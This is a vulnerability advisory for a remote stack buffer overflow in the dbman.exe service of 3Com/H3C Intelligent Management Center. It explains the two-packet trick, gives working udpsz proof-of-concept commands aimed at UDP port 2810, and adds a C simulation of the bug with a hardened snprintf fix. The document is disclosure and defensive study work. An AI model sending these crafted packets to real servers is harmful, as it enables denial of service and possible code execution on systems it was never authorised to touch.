#######################################################################

                             Luigi Auriemma

Application:  3com / H3C Intelligent Management Center (IMC)
              http://www.3com.com/IMC_Enterprise/
Versions:     <= 3.3 SP2 R2606P13
Platforms:    Windows, Linux, Solaris
Bug:          stack overflow in dbman.exe
Exploitation: remote, versus server
Date:         probably found 19 Oct 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

"3Com® Intelligent Management Center (IMC) Enterprise Edition is a
self-contained comprehensive management solution, flexible and scalable
enough to meet the needs of advanced Enterprise networks."

The suite is also sold under the HP and H3C (the original developer)
brands.

#######################################################################

======
2) Bug
======

dbman.exe is a service listening on UDP port 2810 and enabled in the
default configuration of IMC.

The function that handles the incoming packets is vulnerable to a stack
buffer overflow: it calls vsprintf on a stack buffer of about 4
kilobytes to build the following line for dbman_debug.log, and all the
arguments are controlled by the attacker:

  "execute command issued by ip=%u,port=%u,operator='%s'"

The interesting detail is that the service calls recv with a size of
0x1024 bytes but processes only the packets of exactly 0x1000 bytes,
and it always reuses the same input buffer. A first packet of 0x1024
bytes is therefore discarded but leaves its last 0x24 bytes in the
buffer, and a following packet of 0x1000 bytes whose operator string
carries no terminating NUL runs on into those stale bytes, raising the
amount of bytes usable in the overflow.

Note that on Windows the stack canary stops the exploit at a Denial of
Service (no code execution), so only the Solaris and Linux builds are
exploitable for code execution.
#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/udpsz.zip

  udpsz -C "f7103d21 ffff ffffffffffffffffffffffffffffffff 0101 ffffffff ffff" -b 0x61 SERVER 2810 0x1024

and then:

  udpsz -C "f7103d21 ffff ffffffffffffffffffffffffffffffff 0101 ffffffff ffff" -b 0x61 SERVER 2810 0x1000

The first packet (0x1024 bytes) is dropped by the size check but fills
the whole input buffer with 0x61 filler; the second (0x1000 bytes) is
processed and its operator string runs into the tail left behind by the
first one.

#######################################################################

======
4) Fix
======

http://www.zerodayinitiative.com/advisories/ZDI-11-162

#######################################################################
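The following C program is an added example and is not part of the advisory, of udpsz, or of the vendor's dbman code. It models the handler described in section 2 (one input buffer reused across recv() calls, a size check for exactly 0x1000 bytes, and a vsprintf-built log line with the format string quoted above) and replays the two-packet sequence of section 3 against that model, measuring how many bytes the "%s" conversion would consume and how large the log line would become, instead of actually smashing a stack. Everything about the packet layout is an assumption: the 30 header bytes are copied from the udpsz command line and the operator string is assumed to start right after them, the stack buffer is assumed to be exactly 4096 bytes, and the 256-byte operator cap in the hardened variant is an arbitrary sane limit. The names fake_recv, handle_packet, build_pkt, run_poc, vuln_log_len and safe_log are this example's own.

```c
#include <stdio.h>
#include <string.h>

#define RECV_MAX 0x1024 /* bytes requested from recv() (advisory) */
#define PKT_SIZE 0x1000 /* only datagrams of exactly this size are handled */
#define LOG_BUF  4096   /* assumed exact size of the ~4 KB stack buffer */
#define HDR_LEN  30     /* header bytes in the udpsz PoC; assumed to precede the operator */
#define OP_MAX   256    /* assumed sane limit for an operator name */

/* Header bytes as written in the udpsz command line of the PoC. */
static const unsigned char POC_HDR[HDR_LEN] = {
    0xf7,0x10,0x3d,0x21, 0xff,0xff,
    0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
    0x01,0x01, 0xff,0xff,0xff,0xff, 0xff,0xff
};
static const char LOG_FMT[]      = "execute command issued by ip=%u,port=%u,operator='%s'";
static const char LOG_FMT_SAFE[] = "execute command issued by ip=%u,port=%u,operator='%.*s'";
static unsigned char inbuf[RECV_MAX]; /* one buffer reused for every recv() */

/* Simulated recv(): overwrites only the bytes the datagram carries. */
static size_t fake_recv(const unsigned char *pkt, size_t len) {
    if (len > RECV_MAX) len = RECV_MAX;
    memcpy(inbuf, pkt, len);
    return len;
}

/* Bytes "%s" consumes for the operator: vsprintf scans to the first NUL and
 * knows nothing about the datagram length. Capped at the end of inbuf here. */
static size_t operator_strlen(void) {
    size_t n = 0;
    while (HDR_LEN + n < RECV_MAX && inbuf[HDR_LEN + n] != '\0') n++;
    return n;
}

/* Simulated handler: wrong-sized datagrams are dropped (0), otherwise the
 * operator length that the log call will consume is returned. */
static size_t handle_packet(size_t len) {
    return len == PKT_SIZE ? operator_strlen() : 0;
}

/* Datagram shaped like the PoC: header, then 0x61 ('a') filler, no NUL. */
static void build_pkt(unsigned char *pkt, size_t len) {
    memcpy(pkt, POC_HDR, HDR_LEN);
    memset(pkt + HDR_LEN, 0x61, len - HDR_LEN);
}

/* Baseline: a single 0x1000-byte packet into a clean buffer. */
static size_t single_packet(void) {
    unsigned char pkt[RECV_MAX];
    memset(inbuf, 0, sizeof inbuf);
    build_pkt(pkt, PKT_SIZE);
    return handle_packet(fake_recv(pkt, PKT_SIZE));
}

/* The two-step PoC: the 0x1024-byte packet fails the size check but fills the
 * whole buffer; the 0x1000-byte packet overwrites only the first 0x1000 bytes,
 * so its unterminated operator runs on into the 0x24 stale bytes. */
static size_t run_poc(void) {
    unsigned char pkt[RECV_MAX];
    memset(inbuf, 0, sizeof inbuf);
    build_pkt(pkt, RECV_MAX);
    handle_packet(fake_recv(pkt, RECV_MAX)); /* dropped, buffer now full */
    build_pkt(pkt, PKT_SIZE);
    return handle_packet(fake_recv(pkt, PKT_SIZE));
}

/* Size (with NUL) of the line the vulnerable vsprintf would write for the
 * current inbuf; anything above LOG_BUF overruns the stack buffer. */
static size_t vuln_log_len(unsigned ip, unsigned port) {
    char op[RECV_MAX + 1];
    size_t n = operator_strlen();
    memcpy(op, inbuf + HDR_LEN, n);
    op[n] = '\0';
    return (size_t)snprintf(NULL, 0, LOG_FMT, ip, port, op) + 1;
}

/* Hardened equivalent: the untrusted field is length-capped via precision
 * (nothing past the datagram is read) and the output is bounded, so the worst
 * case is a truncated log line. Returns characters written. */
static size_t safe_log(char *out, size_t outsz, unsigned ip, unsigned port, size_t pktlen) {
    size_t oplen = pktlen > HDR_LEN ? pktlen - HDR_LEN : 0;
    if (oplen > OP_MAX) oplen = OP_MAX;
    int n = snprintf(out, outsz, LOG_FMT_SAFE, ip, port, (int)oplen, (const char *)inbuf + HDR_LEN);
    return n < 0 ? 0 : ((size_t)n < outsz ? (size_t)n : outsz - 1);
}

/* Both loggers applied to the buffer state the PoC leaves behind. */
static size_t poc_vuln_log_len(void) { run_poc(); return vuln_log_len(0, 0); }
static size_t poc_safe_log_len(void) {
    char out[LOG_BUF];
    run_poc();
    return safe_log(out, sizeof out, 0, 0, PKT_SIZE);
}

int main(void) {
    printf("operator bytes: single 0x1000 packet %zu, 0x1024 then 0x1000 %zu\n",
           single_packet(), run_poc());
    printf("log line after PoC: vsprintf %zu bytes (buffer %d), snprintf %zu bytes\n",
           poc_vuln_log_len(), LOG_BUF, poc_safe_log_len());
    return 0;
}
```

The baseline packet already pushes the vsprintf line past the assumed 4096-byte buffer (the fixed text around the operator adds 49 bytes); the discarded 0x1024-byte packet then adds exactly 0x24 more attacker bytes to the "%s" expansion, which is the gain the advisory points at. The hardened variant shows the two changes a fix needs: a precision on the untrusted conversion so the formatter never reads past the datagram, and a bounded snprintf so the output can never exceed the stack buffer.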